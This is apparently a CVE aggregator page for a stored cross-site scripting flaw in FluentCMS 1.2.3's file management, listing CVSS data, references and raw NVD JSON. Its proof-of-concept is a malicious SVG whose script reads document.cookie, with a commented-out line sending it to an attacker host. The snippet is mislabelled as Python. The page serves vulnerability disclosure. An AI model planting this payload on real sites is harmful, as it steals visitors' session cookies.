CVE-2025-70842

Description

A Stored Cross-Site Scripting (XSS) vulnerability was discovered in the File Management module of FluentCMS 1.2.3. The flaw allows an authenticated administrator to upload crafted SVG files containing malicious JavaScript code. Once uploaded, the script executes in the browser of any user who accesses the direct URL of the image, including unauthenticated visitors.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FluentCMS 1.2.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC: Malicious SVG for Stored XSS in FluentCMS -->
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="red" />
  <script type="text/javascript">
    // Proof of Concept: Execute JavaScript when SVG is rendered
    alert('CVE-2025-70842 XSS Triggered: ' + document.cookie);
    
    // Example data exfiltration (commented out)
    // fetch('https://attacker-server.com/collect?q=' + encodeURIComponent(document.cookie));
  </script>
</svg>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-70842
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-70842
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-70842/
[4] VulDB https://vuldb.com/cve/CVE-2025-70842
[5] https://github.com/fluentcms/FluentCMS/issues/2404
[6] https://github.com/fluentcms/FluentCMS/pull/2407
[7] https://github.com/fluentcms/FluentCMS/issues/2404

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-70842", "sourceIdentifier": "[email protected]", "published": "2026-05-12T15:16:12.163", "lastModified": "2026-05-13T15:43:05.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-Site Scripting (XSS) vulnerability was discovered in the File Management module of FluentCMS 1.2.3. The flaw allows an authenticated administrator to upload crafted SVG files containing malicious JavaScript code. Once uploaded, the script executes in the browser of any user who accesses the direct URL of the image, including unauthenticated visitors."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/fluentcms/FluentCMS/issues/2404", "source": "[email protected]"}, {"url": "https://github.com/fluentcms/FluentCMS/pull/2407", "source": "[email protected]"}, {"url": "https://github.com/fluentcms/FluentCMS/issues/2404", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}